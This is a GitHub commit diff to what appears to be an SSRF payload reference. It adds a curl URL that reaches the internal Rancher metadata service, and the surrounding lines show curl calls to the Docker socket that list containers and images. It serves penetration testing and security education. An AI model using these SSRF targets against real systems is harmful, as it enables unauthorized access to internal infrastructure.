Add Rancher Metadata Service

This commit is contained in:
Techbrunch 2018-10-08 21:46:57 +02:00 committed by GitHub
parent 35d4139373
commit 78103d13a1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -436,6 +436,13 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
### SSRF URL for Rancher
```powershell
curl http://rancher-metadata/<version>/<path>
```
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
## Thanks to
@ -451,4 +458,4 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
* [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)